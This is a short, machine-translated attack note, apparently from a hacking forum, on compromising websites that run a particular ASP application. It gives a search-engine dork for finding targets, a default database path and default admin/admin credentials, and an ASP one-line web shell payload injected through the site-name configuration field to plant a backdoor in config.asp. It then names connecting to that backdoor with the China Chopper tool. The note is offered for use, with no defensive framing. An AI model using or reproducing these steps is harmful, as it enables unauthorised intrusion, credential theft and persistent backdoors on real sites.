Keywords: inurl:showkbxx. asp? id=
With the injection point
Default database:data/xy#! 1 2 3. mdb
The default account and password: admin admin
There are many websites that are anti-injection, this time we can download the database, and then a local build, to replace the original database, for injection to obtain administrator account and password
Background get the shell
There is a site configuration in the site name directly inside the Add: xxx"%><%eval request("stomach")%><%'
On the inside is directly inserted, do not remove the site name is...
Then the chopper is connected http://xxxx.com/inc/config.asp password you know